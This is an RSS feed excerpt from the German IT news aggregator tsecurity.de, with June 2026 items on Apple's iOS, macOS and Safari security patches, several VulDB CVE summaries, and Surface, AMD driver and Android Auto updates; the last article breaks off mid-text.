<description><![CDATA[Maps erhält auf Android Auto ein Upgrade. Es behebt ein Problem, mit dem viele Nutzer*innen seit langem zu kämpfen haben.]]></description>
<link>https://tsecurity.de/de/3636131/it-nachrichten/android-auto-dieser-fehler-stoert-fahrer-schon-lange-jetzt-kommt-die-loesung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636131/it-nachrichten/android-auto-dieser-fehler-stoert-fahrer-schon-lange-jetzt-kommt-die-loesung/</guid>
<pubDate>Tue, 30 Jun 2026 17:47:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Maps erhält auf Android Auto ein Upgrade. Es behebt ein Problem, mit dem viele Nutzer*innen seit langem zu kämpfen haben.]]></content:encoded>
</item>
<item>
<title><![CDATA[Update time: Apple releases security patches for iOS, MacOS Tahoe, Safari]]></title>
<description><![CDATA[A new Apple update fixes a multitude of browser and browser related vulnerabilities which have been public knowledge for a while This article has been indexed from Malwarebytes Read the original article: Update time: Apple releases security patches for iOS,…
Read more →
The post Update time: Appl...]]></description>
<link>https://tsecurity.de/de/3636055/it-security-nachrichten/update-time-apple-releases-security-patches-for-ios-macos-tahoe-safari/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636055/it-security-nachrichten/update-time-apple-releases-security-patches-for-ios-macos-tahoe-safari/</guid>
<pubDate>Tue, 30 Jun 2026 17:10:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new Apple update fixes a multitude of browser and browser related vulnerabilities which have been public knowledge for a while This article has been indexed from Malwarebytes Read the original article: Update time: Apple releases security patches for iOS,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/update-time-apple-releases-security-patches-for-ios-macos-tahoe-safari/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/update-time-apple-releases-security-patches-for-ios-macos-tahoe-safari/">Update time: Apple releases security patches for iOS, MacOS Tahoe, Safari</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Update time: Apple releases security patches for iOS, MacOS Tahoe, Safari]]></title>
<description><![CDATA[A new Apple update fixes a multitude of browser and browser related vulnerabilities which have been public knowledge for a while]]></description>
<link>https://tsecurity.de/de/3635966/it-security-nachrichten/update-time-apple-releases-security-patches-for-ios-macos-tahoe-safari/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635966/it-security-nachrichten/update-time-apple-releases-security-patches-for-ios-macos-tahoe-safari/</guid>
<pubDate>Tue, 30 Jun 2026 16:50:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new Apple update fixes a multitude of browser and browser related vulnerabilities which have been public knowledge for a while]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Fixes WebKit Flaws in iOS and macOS, With Help From AI Tools]]></title>
<description><![CDATA[Apple released updates for iOS, iPadOS, macOS, and Safari, fixing WebKit flaws, four of which were found using AI tools like Claude and Codex Apple pushed out security updates for iOS, iPadOS, macOS, and Safari on Monday, and this round comes with a twist worth noticing. Four of the WebKit vulner...]]></description>
<link>https://tsecurity.de/de/3635605/hacking/apple-fixes-webkit-flaws-in-ios-and-macos-with-help-from-ai-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635605/hacking/apple-fixes-webkit-flaws-in-ios-and-macos-with-help-from-ai-tools/</guid>
<pubDate>Tue, 30 Jun 2026 14:38:36 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple released updates for iOS, iPadOS, macOS, and Safari, fixing WebKit flaws, four of which were found using AI tools like Claude and Codex Apple pushed out security updates for iOS, iPadOS, macOS, and Safari on Monday, and this round comes with a twist worth noticing. Four of the WebKit vulnerabilities patched were found using […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Fixes WebKit Flaws in iOS and macOS, With Help From AI Tools]]></title>
<description><![CDATA[Apple released updates for iOS, iPadOS, macOS, and Safari, fixing WebKit flaws, four of which were found using AI tools like Claude and Codex Apple pushed out security updates for iOS, iPadOS, macOS, and Safari on Monday, and this round…
Read more →
The post Apple Fixes WebKit Flaws in iOS and ma...]]></description>
<link>https://tsecurity.de/de/3635598/it-security-nachrichten/apple-fixes-webkit-flaws-in-ios-and-macos-with-help-from-ai-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635598/it-security-nachrichten/apple-fixes-webkit-flaws-in-ios-and-macos-with-help-from-ai-tools/</guid>
<pubDate>Tue, 30 Jun 2026 14:38:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple released updates for iOS, iPadOS, macOS, and Safari, fixing WebKit flaws, four of which were found using AI tools like Claude and Codex Apple pushed out security updates for iOS, iPadOS, macOS, and Safari on Monday, and this round…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/apple-fixes-webkit-flaws-in-ios-and-macos-with-help-from-ai-tools/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/apple-fixes-webkit-flaws-in-ios-and-macos-with-help-from-ai-tools/">Apple Fixes WebKit Flaws in iOS and macOS, With Help From AI Tools</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Surface Laptop 8 (Intel) und weitere Surface-Modelle erhalten Firmware-Updates]]></title>
<description><![CDATA[Bei den Modellen des Surface Laptop, die mit einem Snapdragon-Prozessor ausgestattet sind, kann es durch Windows-Updates zu einem Verlust der Funktionalität von Windows Hello kommen. Nach dem Update ist die PIN nicht mehr verfügbar, wodurch auch die anderen Optionen von Windows Hello deaktiviert ...]]></description>
<link>https://tsecurity.de/de/3635589/it-nachrichten/surface-laptop-8-intel-und-weitere-surface-modelle-erhalten-firmware-updates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635589/it-nachrichten/surface-laptop-8-intel-und-weitere-surface-modelle-erhalten-firmware-updates/</guid>
<pubDate>Tue, 30 Jun 2026 14:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img src="https://www.drwindows.de/news/wp-content/uploads/2026/06/surface_laptop_8_surface_pro_12.jpg" class="attachment-single-thumb size-single-thumb wp-post-image" alt="Surface Laptop 8 und Surface Pro 12" decoding="async" fetchpriority="high" srcset="https://www.drwindows.de/news/wp-content/uploads/2026/06/surface_laptop_8_surface_pro_12.jpg 720w, https://www.drwindows.de/news/wp-content/uploads/2026/06/surface_laptop_8_surface_pro_12-300x150.jpg 300w, https://www.drwindows.de/news/wp-content/uploads/2026/06/surface_laptop_8_surface_pro_12-643x322.jpg 643w" sizes="(max-width: 720px) 100vw, 720px"></div>
<p>Bei den Modellen des Surface Laptop, die mit einem Snapdragon-Prozessor ausgestattet sind, kann es durch Windows-Updates zu einem Verlust der Funktionalität von Windows Hello kommen. Nach dem Update ist die PIN nicht mehr verfügbar, wodurch auch die anderen Optionen von Windows Hello deaktiviert werden. Dieses Problem behebt Microsoft mit einem Firmware-Update für die betroffenen Modelle. […]</p>
<p>Der Beitrag <a href="https://www.drwindows.de/news/surface-laptop-8-intel-und-weitere-surface-modelle-erhalten-firmware-updates">Surface Laptop 8 (Intel) und weitere Surface-Modelle erhalten Firmware-Updates</a> erschien zuerst auf <a href="https://www.drwindows.de/news">Dr. Windows</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Adrenalin 26.6.4 für Radeon: Neuer Treiber behebt Abstürze mit FSR 4.1 auf RX-7000-GPUs]]></title>
<description><![CDATA[AMD hat den Adrenalin-Treiber 26.6.4 zum Download bereitgestellt. Es werden Spielabstürze behoben, die zuvor bei Verwendung von FSR 4.1 unter Radeon-RX-7000-GPUs (Test) auftraten. Allerdings bestehen weiterhin gleich mehrere Probleme mit dem Multiplayer-Shooter Battlefield 6.]]></description>
<link>https://tsecurity.de/de/3635587/it-nachrichten/adrenalin-2664-fuer-radeon-neuer-treiber-behebt-abstuerze-mit-fsr-41-auf-rx-7000-gpus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635587/it-nachrichten/adrenalin-2664-fuer-radeon-neuer-treiber-behebt-abstuerze-mit-fsr-41-auf-rx-7000-gpus/</guid>
<pubDate>Tue, 30 Jun 2026 14:32:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/5/4/8-6a629c2d0024292e/article-640x360.b226db8d.jpg"><p>AMD hat den Adrenalin-Treiber 26.6.4 zum Download bereitgestellt. Es werden Spielabstürze behoben, die zuvor bei Verwendung von FSR 4.1 unter Radeon-RX-7000-GPUs (Test) auftraten. Allerdings bestehen weiterhin gleich mehrere Probleme mit dem Multiplayer-Shooter Battlefield 6.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [mittel] Apple Safari: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Apple Safari ausnutzen, um einen Denial of Service Angriff durchzuführen oder vertrauliche Informationen offenzulegen.]]></description>
<link>https://tsecurity.de/de/3635324/it-security-nachrichten/neu-mittel-apple-safari-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635324/it-security-nachrichten/neu-mittel-apple-safari-mehrere-schwachstellen/</guid>
<pubDate>Tue, 30 Jun 2026 13:06:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Apple Safari ausnutzen, um einen Denial of Service Angriff durchzuführen oder vertrauliche Informationen offenzulegen.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43705 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web type confusion (EUVD-2026-40197)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. The impacted element is an unknown function of the component Web Handler. Executing a manipulation can lead to type confusion.

This vulnerability is tracked as CVE-2026-43705. The attac...]]></description>
<link>https://tsecurity.de/de/3635265/sicherheitsluecken/cve-2026-43705-apple-safariiosipadosmacos-up-to-2651-web-type-confusion-euvd-2026-40197/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635265/sicherheitsluecken/cve-2026-43705-apple-safariiosipadosmacos-up-to-2651-web-type-confusion-euvd-2026-40197/</guid>
<pubDate>Tue, 30 Jun 2026 12:40:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. The impacted element is an unknown function of the component <em>Web Handler</em>. Executing a manipulation can lead to type confusion.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-43705">CVE-2026-43705</a>. The attack can be launched remotely. No exploit exists.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43715 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web use after free (EUVD-2026-40183)]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. It has been classified as critical. This vulnerability affects unknown code of the component Web Handler. The manipulation leads to use after free.

This vulnerability is traded as CVE-2026-43715. It is possible to ini...]]></description>
<link>https://tsecurity.de/de/3635264/sicherheitsluecken/cve-2026-43715-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-euvd-2026-40183/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635264/sicherheitsluecken/cve-2026-43715-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-euvd-2026-40183/</guid>
<pubDate>Tue, 30 Jun 2026 12:40:11 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This vulnerability affects unknown code of the component <em>Web Handler</em>. The manipulation leads to use after free.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-43715">CVE-2026-43715</a>. It is possible to initiate the attack remotely. There is no exploit available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43731 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web use after free (EUVD-2026-40204)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. This affects an unknown part of the component Web Handler. Such manipulation leads to use after free.

This vulnerability is referenced as CVE-2026-43731. It is possible to launch the at...]]></description>
<link>https://tsecurity.de/de/3635263/sicherheitsluecken/cve-2026-43731-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-euvd-2026-40204/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635263/sicherheitsluecken/cve-2026-43731-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-euvd-2026-40204/</guid>
<pubDate>Tue, 30 Jun 2026 12:40:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. This affects an unknown part of the component <em>Web Handler</em>. Such manipulation leads to use after free.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-43731">CVE-2026-43731</a>. It is possible to launch the attack remotely. No exploit is available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[June 2026 Apple Updates, (Tue, Jun 30th)]]></title>
<description><![CDATA[Apple released updates for iOS/iPadOS, macOS, and Safari on Monday. There have been no updates for other Apple operating systems (visionOS, watchOS, tvOS). Usually, Apple updates all products at the same time. This article has been indexed from SANS Internet…
Read more →
The post June 2026 Apple...]]></description>
<link>https://tsecurity.de/de/3635139/it-security-nachrichten/june-2026-apple-updates-tue-jun-30th/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635139/it-security-nachrichten/june-2026-apple-updates-tue-jun-30th/</guid>
<pubDate>Tue, 30 Jun 2026 12:08:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple released updates for iOS/iPadOS, macOS, and Safari on Monday. There have been no updates for other Apple operating systems (visionOS, watchOS, tvOS). Usually, Apple updates all products at the same time. This article has been indexed from SANS Internet…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/june-2026-apple-updates-tue-jun-30th/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/june-2026-apple-updates-tue-jun-30th/">June 2026 Apple Updates, (Tue, Jun 30th)</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[June 2026 Apple Updates, (Tue, Jun 30th)]]></title>
<description><![CDATA[Apple released updates for iOS/iPadOS, macOS, and Safari on Monday. There have been no updates for other Apple operating systems (visionOS, watchOS, tvOS). Usually, Apple updates all products at the same time.]]></description>
<link>https://tsecurity.de/de/3635080/it-security-nachrichten/june-2026-apple-updates-tue-jun-30th/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635080/it-security-nachrichten/june-2026-apple-updates-tue-jun-30th/</guid>
<pubDate>Tue, 30 Jun 2026 11:37:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple released updates for iOS/iPadOS, macOS, and Safari on Monday. There have been no updates for other Apple operating systems (visionOS, watchOS, tvOS). Usually, Apple updates all products at the same time.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Patches 30+ iOS, macOS, Safari Flaws, Including AI-Discovered WebKit Bugs]]></title>
<description><![CDATA[Apple on Monday released security updates for iOS, macOS, and the Safari web browser to address over three dozen flaws, including four vulnerabilities in WebKit that were discovered using artificial intelligence (AI) tools like Anthropic Claude and OpenAI Codex Security.…
Read more →
The post App...]]></description>
<link>https://tsecurity.de/de/3634930/it-security-nachrichten/apple-patches-30-ios-macos-safari-flaws-including-ai-discovered-webkit-bugs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634930/it-security-nachrichten/apple-patches-30-ios-macos-safari-flaws-including-ai-discovered-webkit-bugs/</guid>
<pubDate>Tue, 30 Jun 2026 10:20:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple on Monday released security updates for iOS, macOS, and the Safari web browser to address over three dozen flaws, including four vulnerabilities in WebKit that were discovered using artificial intelligence (AI) tools like Anthropic Claude and OpenAI Codex Security.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/apple-patches-30-ios-macos-safari-flaws-including-ai-discovered-webkit-bugs/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/apple-patches-30-ios-macos-safari-flaws-including-ai-discovered-webkit-bugs/">Apple Patches 30+ iOS, macOS, Safari Flaws, Including AI-Discovered WebKit Bugs</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43699 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web use after free (Nessus ID 323673)]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. It has been declared as critical. Affected by this issue is some unknown functionality of the component Web Handler. Executing a manipulation can lead to use after free.

This vulnerability is handled as CVE-2026-43699...]]></description>
<link>https://tsecurity.de/de/3634893/sicherheitsluecken/cve-2026-43699-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-323673/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634893/sicherheitsluecken/cve-2026-43699-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-323673/</guid>
<pubDate>Tue, 30 Jun 2026 10:08:10 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this issue is some unknown functionality of the component <em>Web Handler</em>. Executing a manipulation can lead to use after free.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-43699">CVE-2026-43699</a>. The attack can be executed remotely. There is not any exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43700 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web cross-domain policy (Nessus ID 323673)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. This affects an unknown function of the component Web Handler. The manipulation results in permissive cross-domain policy with untrusted domains.

This vulnerability is reported as...]]></description>
<link>https://tsecurity.de/de/3634892/sicherheitsluecken/cve-2026-43700-apple-safariiosipadosmacos-up-to-2651-web-cross-domain-policy-nessus-id-323673/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634892/sicherheitsluecken/cve-2026-43700-apple-safariiosipadosmacos-up-to-2651-web-cross-domain-policy-nessus-id-323673/</guid>
<pubDate>Tue, 30 Jun 2026 10:08:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. This affects an unknown function of the component <em>Web Handler</em>. The manipulation results in permissive cross-domain policy with untrusted domains.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-43700">CVE-2026-43700</a>. The attack can be launched remotely. No exploit exists.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43701 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Website denial of service (Nessus ID 323673)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. This vulnerability affects unknown code of the component Website Handler. The manipulation results in denial of service.

This vulnerability was named CVE-2026-43701. The attack may...]]></description>
<link>https://tsecurity.de/de/3634891/sicherheitsluecken/cve-2026-43701-apple-safariiosipadosmacos-up-to-2651-website-denial-of-service-nessus-id-323673/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634891/sicherheitsluecken/cve-2026-43701-apple-safariiosipadosmacos-up-to-2651-website-denial-of-service-nessus-id-323673/</guid>
<pubDate>Tue, 30 Jun 2026 10:08:08 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. This vulnerability affects unknown code of the component <em>Website Handler</em>. The manipulation results in denial of service.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-43701">CVE-2026-43701</a>. The attack may be performed from remote. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43704 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web use after free (Nessus ID 323673)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. The affected element is an unknown function of the component Web Handler. Performing a manipulation results in use after free.

This vulnerability is identified as CVE-2026-43704. The attack ...]]></description>
<link>https://tsecurity.de/de/3634889/sicherheitsluecken/cve-2026-43704-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-323673/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634889/sicherheitsluecken/cve-2026-43704-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-323673/</guid>
<pubDate>Tue, 30 Jun 2026 10:08:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. The affected element is an unknown function of the component <em>Web Handler</em>. Performing a manipulation results in use after free.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-43704">CVE-2026-43704</a>. The attack can be initiated remotely. There is not any exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Security Update Patches 30+ Vulnerabilities in iOS 26.5.2]]></title>
<description><![CDATA[The latest Apple Security Update brings fixes for more than 30 security vulnerabilities in iOS 26.5.2 and iPadOS 26.5.2, addressing flaws across the kernel, WebKit, WebRTC, libxslt, and IOGPUFamily. Released on June 29, Apple said the update includes security fixes that were previously introduced...]]></description>
<link>https://tsecurity.de/de/3634865/it-security-nachrichten/apple-security-update-patches-30-vulnerabilities-in-ios-2652/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634865/it-security-nachrichten/apple-security-update-patches-30-vulnerabilities-in-ios-2652/</guid>
<pubDate>Tue, 30 Jun 2026 09:53:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Apple Security Update" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Apple-Security-Update-1-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Apple Security Update Patches 30+ Vulnerabilities in iOS 26.5.2 1"></p><div class="qMYqUG_convSearchResultHighlightRoot">
<div class="" data-turn-id-container="request-WEB:f4fd7409-85d3-404f-8a65-6c2f2c2f3d19-14" data-is-intersecting="true"><section class="text-token-text-primary w-full focus:outline-none has-data-writing-block:pointer-events-none [&amp;:has([data-writing-block])&gt;*]:pointer-events-auto R6Vx5W_threadScrollVars scroll-mb-[calc(var(--scroll-root-safe-area-inset-bottom,0px)+var(--thread-response-height))] scroll-mt-[calc(var(--header-height)+min(200px,max(70px,20svh)))]" dir="auto" data-turn-id="request-WEB:f4fd7409-85d3-404f-8a65-6c2f2c2f3d19-14" data-turn-id-container="request-WEB:f4fd7409-85d3-404f-8a65-6c2f2c2f3d19-14" data-testid="conversation-turn-30" data-turn="assistant">
<div class="text-base my-auto mx-auto pb-10 [--thread-content-margin:var(--thread-content-margin-xs,calc(var(--spacing)*4))] @w-sm/main:[--thread-content-margin:var(--thread-content-margin-sm,calc(var(--spacing)*6))] @w-lg/main:[--thread-content-margin:var(--thread-content-margin-lg,calc(var(--spacing)*16))] px-(--thread-content-margin)">
<div class="[--thread-content-max-width:40rem] @w-lg/main:[--thread-content-max-width:48rem] mx-auto max-w-(--thread-content-max-width) flex-1 group/turn-messages focus-visible:outline-hidden relative flex w-full min-w-0 flex-col agent-turn" data-conversation-screenshot-content="">
<div class="flex max-w-full flex-col gap-4 grow">
<div class="min-h-8 text-message relative flex w-full flex-col items-end gap-2 text-start break-words whitespace-normal outline-none keyboard-focused:focus-ring [.text-message+&amp;]:mt-1" dir="auto" tabindex="0" data-message-author-role="assistant" data-message-id="e32e8865-0f23-42a7-b6d0-4c4a35a807ad" data-message-model-slug="gpt-5-5" data-turn-start-message="true">
<div class="flex w-full flex-col gap-1 empty:hidden">
<div class="markdown prose dark:prose-invert wrap-break-word w-full light markdown-new-styling">
<p data-start="666" data-end="1125">The latest Apple Security Update brings fixes for more than 30 security <a href="https://thecyberexpress.com/?s=vulnerabilities" target="_blank" rel="noopener">vulnerabilities</a> in iOS 26.5.2 and iPadOS 26.5.2, addressing flaws across the kernel, WebKit, WebRTC, libxslt, and IOGPUFamily. Released on June 29, <a href="https://thecyberexpress.com/webkit-vulnerability-fixed-in-apple-update/" target="_blank" rel="noopener">Apple</a> said the update includes security fixes that were previously introduced in the iOS 26.6 and iPadOS 26.6 beta releases, strengthening protections for supported iPhone and iPad devices.</p>
<p data-start="1127" data-end="1417">The update is available for iPhone 11 and later, iPad Pro 12.9-inch (3rd generation and later), iPad Pro 11-inch (1st generation and later), iPad Air (3rd generation and later), iPad (8th generation and later), and iPad mini (5th generation and later).</p>

<h3 data-section-id="1a0l6c6" data-start="1419" data-end="1497"><strong><span role="text">Apple Security Update Addresses Kernel and System-Level Vulnerabilities</span></strong></h3>
<p data-start="1499" data-end="1742">Among the most significant Apple security fixes are several kernel <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="28878">vulnerabilities</a> that could allow an application to trigger unexpected system termination, write to kernel memory, leak sensitive kernel state, or corrupt kernel memory.</p>
<p data-start="1744" data-end="1965">Apple <a href="https://support.apple.com/en-us/127594" target="_blank" rel="nofollow noopener">said</a> these issues were resolved through improved input sanitization and input validation. The patched vulnerabilities include CVE-2026-43724, CVE-2026-43722, and CVE-2026-39868.</p>
<p data-start="1967" data-end="2206">The update also resolves a flaw in IOGPUFamily (CVE-2026-43743) that could allow an application to cause an unexpected system termination. Apple addressed the issue through improved state handling.</p>

<h3 data-section-id="14loq5d" data-start="2208" data-end="2274"><strong><span role="text">Apple Security Update Delivers Extensive WebKit Protections</span></strong></h3>
